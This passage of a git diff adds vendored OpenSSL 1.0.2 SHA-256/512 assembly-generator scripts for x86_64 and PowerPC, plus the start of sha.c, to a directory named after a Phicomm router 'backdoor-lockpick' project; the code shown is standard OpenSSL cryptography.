+	mov	$G,$SZ*6($ctx)
+	mov	$H,$SZ*7($ctx)
+
+	cmp	`$PUSH8+2*8`($Tbl),$inp	# $_end
+	je	.Ldone_avx2
+
+	xor	$a1,$a1
+	mov	$B,$a3
+	xor	$C,$a3			# magic
+	mov	$F,$a4
+	jmp	.Lower_avx2
+.align	16
+.Lower_avx2:
+___
+    for ($i=0; $i<8; ) {
+	my $base="+16($Tbl)";
+	foreach(bodyx_00_15()) { eval; }
+    }
+$code.=<<___;
+	lea	-$PUSH8($Tbl),$Tbl
+	cmp	%rsp,$Tbl
+	jae	.Lower_avx2
+
+	mov	`2*$SZ*$rounds`(%rsp),$ctx	# $_ctx
+	add	$a1,$A
+	#mov	`2*$SZ*$rounds+8`(%rsp),$inp	# $_inp
+	lea	`2*$SZ*($rounds-8)`(%rsp),%rsp
+
+	add	$SZ*0($ctx),$A
+	add	$SZ*1($ctx),$B
+	add	$SZ*2($ctx),$C
+	add	$SZ*3($ctx),$D
+	add	$SZ*4($ctx),$E
+	add	$SZ*5($ctx),$F
+	lea	`2*16*$SZ`($inp),$inp	# inp+=2
+	add	$SZ*6($ctx),$G
+	mov	$inp,%r12
+	add	$SZ*7($ctx),$H
+	cmp	$_end,$inp
+
+	mov	$A,$SZ*0($ctx)
+	cmove	%rsp,%r12		# next block or stale data
+	mov	$B,$SZ*1($ctx)
+	mov	$C,$SZ*2($ctx)
+	mov	$D,$SZ*3($ctx)
+	mov	$E,$SZ*4($ctx)
+	mov	$F,$SZ*5($ctx)
+	mov	$G,$SZ*6($ctx)
+	mov	$H,$SZ*7($ctx)
+
+	jbe	.Loop_avx2
+	lea	(%rsp),$Tbl
+
+.Ldone_avx2:
+	lea	($Tbl),%rsp
+	mov	$_rsp,%rsi
+	vzeroupper
+___
+$code.=<<___ if ($win64);
+	movaps	16*$SZ+32(%rsp),%xmm6
+	movaps	16*$SZ+48(%rsp),%xmm7
+	movaps	16*$SZ+64(%rsp),%xmm8
+	movaps	16*$SZ+80(%rsp),%xmm9
+___
+$code.=<<___ if ($win64 && $SZ>4);
+	movaps	16*$SZ+96(%rsp),%xmm10
+	movaps	16*$SZ+112(%rsp),%xmm11
+___
+$code.=<<___;
+	mov	(%rsi),%r15
+	mov	8(%rsi),%r14
+	mov	16(%rsi),%r13
+	mov	24(%rsi),%r12
+	mov	32(%rsi),%rbp
+	mov	40(%rsi),%rbx
+	lea	48(%rsi),%rsp
+.Lepilogue_avx2:
+	ret
+.size	${func}_avx2,.-${func}_avx2
+___
+}}
+}}}}}
+
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+if ($win64) {
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+.type	se_handler,\@abi-omnipotent
+.align	16
+se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HanderlData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# prologue label
+	cmp	%r10,%rbx		# context->Rip<prologue label
+	jb	.Lin_prologue
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lin_prologue
+___
+$code.=<<___ if ($avx>1);
+	lea	.Lavx2_shortcut(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<avx2_shortcut
+	jb	.Lnot_in_avx2
+
+	and	\$-256*$SZ,%rax
+	add	\$`2*$SZ*($rounds-8)`,%rax
+.Lnot_in_avx2:
+___
+$code.=<<___;
+	mov	%rax,%rsi		# put aside Rsp
+	mov	16*$SZ+3*8(%rax),%rax	# pull $_rsp
+	lea	48(%rax),%rax
+
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%rbp
+	mov	-24(%rax),%r12
+	mov	-32(%rax),%r13
+	mov	-40(%rax),%r14
+	mov	-48(%rax),%r15
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore context->R12
+	mov	%r13,224($context)	# restore context->R13
+	mov	%r14,232($context)	# restore context->R14
+	mov	%r15,240($context)	# restore context->R15
+
+	lea	.Lepilogue(%rip),%r10
+	cmp	%r10,%rbx
+	jb	.Lin_prologue		# non-AVX code
+
+	lea	16*$SZ+4*8(%rsi),%rsi	# Xmm6- save area
+	lea	512($context),%rdi	# &context.Xmm6
+	mov	\$`$SZ==4?8:12`,%ecx
+	.long	0xa548f3fc		# cld; rep movsq
+
+.Lin_prologue:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$154,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	se_handler,.-se_handler
+___
+
+$code.=<<___ if ($SZ==4 && $shaext);
+.type	shaext_handler,\@abi-omnipotent
+.align	16
+shaext_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	lea	.Lprologue_shaext(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<.Lprologue
+	jb	.Lin_prologue
+
+	lea	.Lepilogue_shaext(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip>=.Lepilogue
+	jae	.Lin_prologue
+
+	lea	-8-5*16(%rax),%rsi
+	lea	512($context),%rdi	# &context.Xmm6
+	mov	\$10,%ecx
+	.long	0xa548f3fc		# cld; rep movsq
+
+	jmp	.Lin_prologue
+.size	shaext_handler,.-shaext_handler
+___
+
+$code.=<<___;
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_$func
+	.rva	.LSEH_end_$func
+	.rva	.LSEH_info_$func
+___
+$code.=<<___ if ($SZ==4 && $shaext);
+	.rva	.LSEH_begin_${func}_shaext
+	.rva	.LSEH_end_${func}_shaext
+	.rva	.LSEH_info_${func}_shaext
+___
+$code.=<<___ if ($SZ==4);
+	.rva	.LSEH_begin_${func}_ssse3
+	.rva	.LSEH_end_${func}_ssse3
+	.rva	.LSEH_info_${func}_ssse3
+___
+$code.=<<___ if ($avx && $SZ==8);
+	.rva	.LSEH_begin_${func}_xop
+	.rva	.LSEH_end_${func}_xop
+	.rva	.LSEH_info_${func}_xop
+___
+$code.=<<___ if ($avx);
+	.rva	.LSEH_begin_${func}_avx
+	.rva	.LSEH_end_${func}_avx
+	.rva	.LSEH_info_${func}_avx
+___
+$code.=<<___ if ($avx>1);
+	.rva	.LSEH_begin_${func}_avx2
+	.rva	.LSEH_end_${func}_avx2
+	.rva	.LSEH_info_${func}_avx2
+___
+$code.=<<___;
+.section	.xdata
+.align	8
+.LSEH_info_$func:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lprologue,.Lepilogue			# HandlerData[]
+___
+$code.=<<___ if ($SZ==4 && $shaext);
+.LSEH_info_${func}_shaext:
+	.byte	9,0,0,0
+	.rva	shaext_handler
+___
+$code.=<<___ if ($SZ==4);
+.LSEH_info_${func}_ssse3:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lprologue_ssse3,.Lepilogue_ssse3	# HandlerData[]
+___
+$code.=<<___ if ($avx && $SZ==8);
+.LSEH_info_${func}_xop:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lprologue_xop,.Lepilogue_xop		# HandlerData[]
+___
+$code.=<<___ if ($avx);
+.LSEH_info_${func}_avx:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lprologue_avx,.Lepilogue_avx		# HandlerData[]
+___
+$code.=<<___ if ($avx>1);
+.LSEH_info_${func}_avx2:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lprologue_avx2,.Lepilogue_avx2		# HandlerData[]
+___
+}
+
+sub sha256op38 {
+    my $instr = shift;
+    my %opcodelet = (
+		"sha256rnds2" => 0xcb,
+  		"sha256msg1"  => 0xcc,
+		"sha256msg2"  => 0xcd	);
+
+    if (defined($opcodelet{$instr}) && @_[0] =~ /%xmm([0-7]),\s*%xmm([0-7])/) {
+      my @opcode=(0x0f,0x38);
+	push @opcode,$opcodelet{$instr};
+	push @opcode,0xc0|($1&7)|(($2&7)<<3);		# ModR/M
+	return ".byte\t".join(',',@opcode);
+    } else {
+	return $instr."\t".@_[0];
+    }
+}
+
+foreach (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval $1/geo;
+
+	s/\b(sha256[^\s]*)\s+(.*)/sha256op38($1,$2)/geo;
+
+	print $_,"\n";
+}
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512p8-ppc.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512p8-ppc.pl
new file mode 100755
index 0000000..4718950
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512p8-ppc.pl
@@ -0,0 +1,424 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# SHA256/512 for PowerISA v2.07.
+#
+# Accurate performance measurements are problematic, because it's
+# always virtualized setup with possibly throttled processor.
+# Relative comparison is therefore more informative. This module is
+# ~60% faster than integer-only sha512-ppc.pl. To anchor to something
+# else, SHA256 is 24% slower than sha1-ppc.pl and 2.5x slower than
+# hardware-assisted aes-128-cbc encrypt. SHA512 is 20% faster than
+# sha1-ppc.pl and 1.6x slower than aes-128-cbc. Another interesting
+# result is degree of computational resources' utilization. POWER8 is
+# "massively multi-threaded chip" and difference between single- and
+# maximum multi-process benchmark results tells that utlization is
+# whooping 94%. For sha512-ppc.pl we get [not unimpressive] 84% and
+# for sha1-ppc.pl - 73%. 100% means that multi-process result equals
+# to single-process one, given that all threads end up on the same
+# physical core.
+
+$flavour=shift;
+$output =shift;
+
+if ($flavour =~ /64/) {
+	$SIZE_T=8;
+	$LRSAVE=2*$SIZE_T;
+	$STU="stdu";
+	$POP="ld";
+	$PUSH="std";
+} elsif ($flavour =~ /32/) {
+	$SIZE_T=4;
+	$LRSAVE=$SIZE_T;
+	$STU="stwu";
+	$POP="lwz";
+	$PUSH="stw";
+} else { die "nonsense $flavour"; }
+
+$LENDIAN=($flavour=~/le/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}ppc-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/ppc-xlate.pl" and -f $xlate) or
+die "can't locate ppc-xlate.pl";
+
+open STDOUT,"| $^X $xlate $flavour $output" || die "can't call $xlate: $!";
+
+if ($output =~ /512/) {
+	$bits=512;
+	$SZ=8;
+	$sz="d";
+	$rounds=80;
+} else {
+	$bits=256;
+	$SZ=4;
+	$sz="w";
+	$rounds=64;
+}
+
+$func="sha${bits}_block_p8";
+$FRAME=8*$SIZE_T;
+
+$sp ="r1";
+$toc="r2";
+$ctx="r3";
+$inp="r4";
+$num="r5";
+$Tbl="r6";
+$idx="r7";
+$lrsave="r8";
+$offload="r11";
+$vrsave="r12";
+($x00,$x10,$x20,$x30,$x40,$x50,$x60,$x70)=map("r$_",(0,10,26..31));
+ $x00=0 if ($flavour =~ /osx/);
+
+@V=($A,$B,$C,$D,$E,$F,$G,$H)=map("v$_",(0..7));
+@X=map("v$_",(8..23));
+($Ki,$Func,$S0,$S1,$s0,$s1,$lemask)=map("v$_",(24..31));
+
+sub ROUND {
+my ($i,$a,$b,$c,$d,$e,$f,$g,$h)=@_;
+my $j=($i+1)%16;
+
+$code.=<<___		if ($i<15 && ($i%(16/$SZ))==(16/$SZ-1));
+	lvx_u		@X[$i+1],0,$inp		; load X[i] in advance
+	addi		$inp,$inp,16
+___
+$code.=<<___		if ($i<16 && ($i%(16/$SZ)));
+	vsldoi		@X[$i],@X[$i-1],@X[$i-1],$SZ
+___
+$code.=<<___		if ($LENDIAN && $i<16 && ($i%(16/$SZ))==0);
+	vperm		@X[$i],@X[$i],@X[$i],$lemask
+___
+$code.=<<___;
+	`"vshasigma${sz}	$s0,@X[($j+1)%16],0,0"		if ($i>=15)`
+	vsel		$Func,$g,$f,$e		; Ch(e,f,g)
+	vshasigma${sz}	$S1,$e,1,15		; Sigma1(e)
+	vaddu${sz}m	$h,$h,@X[$i%16]		; h+=X[i]
+	vshasigma${sz}	$S0,$a,1,0		; Sigma0(a)
+	`"vshasigma${sz}	$s1,@X[($j+14)%16],0,15"	if ($i>=15)`
+	vaddu${sz}m	$h,$h,$Func		; h+=Ch(e,f,g)
+	vxor		$Func,$a,$b
+	`"vaddu${sz}m		@X[$j],@X[$j],@X[($j+9)%16]"	if ($i>=15)`
+	vaddu${sz}m	$h,$h,$S1		; h+=Sigma1(e)
+	vsel		$Func,$b,$c,$Func	; Maj(a,b,c)
+	vaddu${sz}m	$g,$g,$Ki		; future h+=K[i]
+	vaddu${sz}m	$d,$d,$h		; d+=h
+	vaddu${sz}m	$S0,$S0,$Func		; Sigma0(a)+Maj(a,b,c)
+	`"vaddu${sz}m		@X[$j],@X[$j],$s0"		if ($i>=15)`
+	lvx		$Ki,$idx,$Tbl		; load next K[i]
+	addi		$idx,$idx,16
+	vaddu${sz}m	$h,$h,$S0		; h+=Sigma0(a)+Maj(a,b,c)
+	`"vaddu${sz}m		@X[$j],@X[$j],$s1"		if ($i>=15)`
+___
+}
+
+$code=<<___;
+.machine	"any"
+.text
+
+.globl	$func
+.align	6
+$func:
+	$STU		$sp,-`($FRAME+21*16+6*$SIZE_T)`($sp)
+	mflr		$lrsave
+	li		r10,`$FRAME+8*16+15`
+	li		r11,`$FRAME+8*16+31`
+	stvx		v20,r10,$sp		# ABI says so
+	addi		r10,r10,32
+	mfspr		$vrsave,256
+	stvx		v21,r11,$sp
+	addi		r11,r11,32
+	stvx		v22,r10,$sp
+	addi		r10,r10,32
+	stvx		v23,r11,$sp
+	addi		r11,r11,32
+	stvx		v24,r10,$sp
+	addi		r10,r10,32
+	stvx		v25,r11,$sp
+	addi		r11,r11,32
+	stvx		v26,r10,$sp
+	addi		r10,r10,32
+	stvx		v27,r11,$sp
+	addi		r11,r11,32
+	stvx		v28,r10,$sp
+	addi		r10,r10,32
+	stvx		v29,r11,$sp
+	addi		r11,r11,32
+	stvx		v30,r10,$sp
+	stvx		v31,r11,$sp
+	li		r11,-1
+	stw		$vrsave,`$FRAME+21*16-4`($sp)	# save vrsave
+	li		$x10,0x10
+	$PUSH		r26,`$FRAME+21*16+0*$SIZE_T`($sp)
+	li		$x20,0x20
+	$PUSH		r27,`$FRAME+21*16+1*$SIZE_T`($sp)
+	li		$x30,0x30
+	$PUSH		r28,`$FRAME+21*16+2*$SIZE_T`($sp)
+	li		$x40,0x40
+	$PUSH		r29,`$FRAME+21*16+3*$SIZE_T`($sp)
+	li		$x50,0x50
+	$PUSH		r30,`$FRAME+21*16+4*$SIZE_T`($sp)
+	li		$x60,0x60
+	$PUSH		r31,`$FRAME+21*16+5*$SIZE_T`($sp)
+	li		$x70,0x70
+	$PUSH		$lrsave,`$FRAME+21*16+6*$SIZE_T+$LRSAVE`($sp)
+	mtspr		256,r11
+
+	bl		LPICmeup
+	addi		$offload,$sp,$FRAME+15
+___
+$code.=<<___		if ($LENDIAN);
+	li		$idx,8
+	lvsl		$lemask,0,$idx
+	vspltisb	$Ki,0x0f
+	vxor		$lemask,$lemask,$Ki
+___
+$code.=<<___		if ($SZ==4);
+	lvx_4w		$A,$x00,$ctx
+	lvx_4w		$E,$x10,$ctx
+	vsldoi		$B,$A,$A,4		# unpack
+	vsldoi		$C,$A,$A,8
+	vsldoi		$D,$A,$A,12
+	vsldoi		$F,$E,$E,4
+	vsldoi		$G,$E,$E,8
+	vsldoi		$H,$E,$E,12
+___
+$code.=<<___		if ($SZ==8);
+	lvx_u		$A,$x00,$ctx
+	lvx_u		$C,$x10,$ctx
+	lvx_u		$E,$x20,$ctx
+	vsldoi		$B,$A,$A,8		# unpack
+	lvx_u		$G,$x30,$ctx
+	vsldoi		$D,$C,$C,8
+	vsldoi		$F,$E,$E,8
+	vsldoi		$H,$G,$G,8
+___
+$code.=<<___;
+	li		r0,`($rounds-16)/16`	# inner loop counter
+	b		Loop
+.align	5
+Loop:
+	lvx		$Ki,$x00,$Tbl
+	li		$idx,16
+	lvx_u		@X[0],0,$inp
+	addi		$inp,$inp,16
+	stvx		$A,$x00,$offload	# offload $A-$H
+	stvx		$B,$x10,$offload
+	stvx		$C,$x20,$offload
+	stvx		$D,$x30,$offload
+	stvx		$E,$x40,$offload
+	stvx		$F,$x50,$offload
+	stvx		$G,$x60,$offload
+	stvx		$H,$x70,$offload
+	vaddu${sz}m	$H,$H,$Ki		# h+K[i]
+	lvx		$Ki,$idx,$Tbl
+	addi		$idx,$idx,16
+___
+for ($i=0;$i<16;$i++)	{ &ROUND($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	mtctr		r0
+	b		L16_xx
+.align	5
+L16_xx:
+___
+for (;$i<32;$i++)	{ &ROUND($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	bdnz		L16_xx
+
+	lvx		@X[2],$x00,$offload
+	subic.		$num,$num,1
+	lvx		@X[3],$x10,$offload
+	vaddu${sz}m	$A,$A,@X[2]
+	lvx		@X[4],$x20,$offload
+	vaddu${sz}m	$B,$B,@X[3]
+	lvx		@X[5],$x30,$offload
+	vaddu${sz}m	$C,$C,@X[4]
+	lvx		@X[6],$x40,$offload
+	vaddu${sz}m	$D,$D,@X[5]
+	lvx		@X[7],$x50,$offload
+	vaddu${sz}m	$E,$E,@X[6]
+	lvx		@X[8],$x60,$offload
+	vaddu${sz}m	$F,$F,@X[7]
+	lvx		@X[9],$x70,$offload
+	vaddu${sz}m	$G,$G,@X[8]
+	vaddu${sz}m	$H,$H,@X[9]
+	bne		Loop
+___
+$code.=<<___		if ($SZ==4);
+	lvx		@X[0],$idx,$Tbl
+	addi		$idx,$idx,16
+	vperm		$A,$A,$B,$Ki		# pack the answer
+	lvx		@X[1],$idx,$Tbl
+	vperm		$E,$E,$F,$Ki
+	vperm		$A,$A,$C,@X[0]
+	vperm		$E,$E,$G,@X[0]
+	vperm		$A,$A,$D,@X[1]
+	vperm		$E,$E,$H,@X[1]
+	stvx_4w		$A,$x00,$ctx
+	stvx_4w		$E,$x10,$ctx
+___
+$code.=<<___		if ($SZ==8);
+	vperm		$A,$A,$B,$Ki		# pack the answer
+	vperm		$C,$C,$D,$Ki
+	vperm		$E,$E,$F,$Ki
+	vperm		$G,$G,$H,$Ki
+	stvx_u		$A,$x00,$ctx
+	stvx_u		$C,$x10,$ctx
+	stvx_u		$E,$x20,$ctx
+	stvx_u		$G,$x30,$ctx
+___
+$code.=<<___;
+	li		r10,`$FRAME+8*16+15`
+	mtlr		$lrsave
+	li		r11,`$FRAME+8*16+31`
+	mtspr		256,$vrsave
+	lvx		v20,r10,$sp		# ABI says so
+	addi		r10,r10,32
+	lvx		v21,r11,$sp
+	addi		r11,r11,32
+	lvx		v22,r10,$sp
+	addi		r10,r10,32
+	lvx		v23,r11,$sp
+	addi		r11,r11,32
+	lvx		v24,r10,$sp
+	addi		r10,r10,32
+	lvx		v25,r11,$sp
+	addi		r11,r11,32
+	lvx		v26,r10,$sp
+	addi		r10,r10,32
+	lvx		v27,r11,$sp
+	addi		r11,r11,32
+	lvx		v28,r10,$sp
+	addi		r10,r10,32
+	lvx		v29,r11,$sp
+	addi		r11,r11,32
+	lvx		v30,r10,$sp
+	lvx		v31,r11,$sp
+	$POP		r26,`$FRAME+21*16+0*$SIZE_T`($sp)
+	$POP		r27,`$FRAME+21*16+1*$SIZE_T`($sp)
+	$POP		r28,`$FRAME+21*16+2*$SIZE_T`($sp)
+	$POP		r29,`$FRAME+21*16+3*$SIZE_T`($sp)
+	$POP		r30,`$FRAME+21*16+4*$SIZE_T`($sp)
+	$POP		r31,`$FRAME+21*16+5*$SIZE_T`($sp)
+	addi		$sp,$sp,`$FRAME+21*16+6*$SIZE_T`
+	blr
+	.long		0
+	.byte		0,12,4,1,0x80,6,3,0
+	.long		0
+.size	$func,.-$func
+___
+
+# Ugly hack here, because PPC assembler syntax seem to vary too
+# much from platforms to platform...
+$code.=<<___;
+.align	6
+LPICmeup:
+	mflr	r0
+	bcl	20,31,\$+4
+	mflr	$Tbl	; vvvvvv "distance" between . and 1st data entry
+	addi	$Tbl,$Tbl,`64-8`
+	mtlr	r0
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+	.space	`64-9*4`
+___
+
+if ($SZ==8) {
+    local *table = sub {
+	foreach(@_) { $code.=".quad	$_,$_\n"; }
+    };
+    table(
+	"0x428a2f98d728ae22","0x7137449123ef65cd",
+	"0xb5c0fbcfec4d3b2f","0xe9b5dba58189dbbc",
+	"0x3956c25bf348b538","0x59f111f1b605d019",
+	"0x923f82a4af194f9b","0xab1c5ed5da6d8118",
+	"0xd807aa98a3030242","0x12835b0145706fbe",
+	"0x243185be4ee4b28c","0x550c7dc3d5ffb4e2",
+	"0x72be5d74f27b896f","0x80deb1fe3b1696b1",
+	"0x9bdc06a725c71235","0xc19bf174cf692694",
+	"0xe49b69c19ef14ad2","0xefbe4786384f25e3",
+	"0x0fc19dc68b8cd5b5","0x240ca1cc77ac9c65",
+	"0x2de92c6f592b0275","0x4a7484aa6ea6e483",
+	"0x5cb0a9dcbd41fbd4","0x76f988da831153b5",
+	"0x983e5152ee66dfab","0xa831c66d2db43210",
+	"0xb00327c898fb213f","0xbf597fc7beef0ee4",
+	"0xc6e00bf33da88fc2","0xd5a79147930aa725",
+	"0x06ca6351e003826f","0x142929670a0e6e70",
+	"0x27b70a8546d22ffc","0x2e1b21385c26c926",
+	"0x4d2c6dfc5ac42aed","0x53380d139d95b3df",
+	"0x650a73548baf63de","0x766a0abb3c77b2a8",
+	"0x81c2c92e47edaee6","0x92722c851482353b",
+	"0xa2bfe8a14cf10364","0xa81a664bbc423001",
+	"0xc24b8b70d0f89791","0xc76c51a30654be30",
+	"0xd192e819d6ef5218","0xd69906245565a910",
+	"0xf40e35855771202a","0x106aa07032bbd1b8",
+	"0x19a4c116b8d2d0c8","0x1e376c085141ab53",
+	"0x2748774cdf8eeb99","0x34b0bcb5e19b48a8",
+	"0x391c0cb3c5c95a63","0x4ed8aa4ae3418acb",
+	"0x5b9cca4f7763e373","0x682e6ff3d6b2b8a3",
+	"0x748f82ee5defb2fc","0x78a5636f43172f60",
+	"0x84c87814a1f0ab72","0x8cc702081a6439ec",
+	"0x90befffa23631e28","0xa4506cebde82bde9",
+	"0xbef9a3f7b2c67915","0xc67178f2e372532b",
+	"0xca273eceea26619c","0xd186b8c721c0c207",
+	"0xeada7dd6cde0eb1e","0xf57d4f7fee6ed178",
+	"0x06f067aa72176fba","0x0a637dc5a2c898a6",
+	"0x113f9804bef90dae","0x1b710b35131c471b",
+	"0x28db77f523047d84","0x32caab7b40c72493",
+	"0x3c9ebe0a15c9bebc","0x431d67c49c100d4c",
+	"0x4cc5d4becb3e42b6","0x597f299cfc657e2a",
+	"0x5fcb6fab3ad6faec","0x6c44198c4a475817","0");
+$code.=<<___	if (!$LENDIAN);
+.quad	0x0001020304050607,0x1011121314151617
+___
+$code.=<<___	if ($LENDIAN);	# quad-swapped
+.quad	0x1011121314151617,0x0001020304050607
+___
+} else {
+    local *table = sub {
+	foreach(@_) { $code.=".long	$_,$_,$_,$_\n"; }
+    };
+    table(
+	"0x428a2f98","0x71374491","0xb5c0fbcf","0xe9b5dba5",
+	"0x3956c25b","0x59f111f1","0x923f82a4","0xab1c5ed5",
+	"0xd807aa98","0x12835b01","0x243185be","0x550c7dc3",
+	"0x72be5d74","0x80deb1fe","0x9bdc06a7","0xc19bf174",
+	"0xe49b69c1","0xefbe4786","0x0fc19dc6","0x240ca1cc",
+	"0x2de92c6f","0x4a7484aa","0x5cb0a9dc","0x76f988da",
+	"0x983e5152","0xa831c66d","0xb00327c8","0xbf597fc7",
+	"0xc6e00bf3","0xd5a79147","0x06ca6351","0x14292967",
+	"0x27b70a85","0x2e1b2138","0x4d2c6dfc","0x53380d13",
+	"0x650a7354","0x766a0abb","0x81c2c92e","0x92722c85",
+	"0xa2bfe8a1","0xa81a664b","0xc24b8b70","0xc76c51a3",
+	"0xd192e819","0xd6990624","0xf40e3585","0x106aa070",
+	"0x19a4c116","0x1e376c08","0x2748774c","0x34b0bcb5",
+	"0x391c0cb3","0x4ed8aa4a","0x5b9cca4f","0x682e6ff3",
+	"0x748f82ee","0x78a5636f","0x84c87814","0x8cc70208",
+	"0x90befffa","0xa4506ceb","0xbef9a3f7","0xc67178f2","0");
+$code.=<<___	if (!$LENDIAN);
+.long	0x00010203,0x10111213,0x10111213,0x10111213
+.long	0x00010203,0x04050607,0x10111213,0x10111213
+.long	0x00010203,0x04050607,0x08090a0b,0x10111213
+___
+$code.=<<___	if ($LENDIAN);	# word-swapped
+.long	0x10111213,0x10111213,0x10111213,0x00010203
+.long	0x10111213,0x10111213,0x04050607,0x00010203
+.long	0x10111213,0x08090a0b,0x04050607,0x00010203
+___
+}
+$code.=<<___;
+.asciz	"SHA${bits} for PowerISA 2.07, CRYPTOGAMS by <appro\@openssl.org>"
+.align	2
+___
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha.c
new file mode 100644
index 0000000..cfc12f3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha.c
@@ -0,0 +1,118 @@
+/* crypto/sha/sha.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
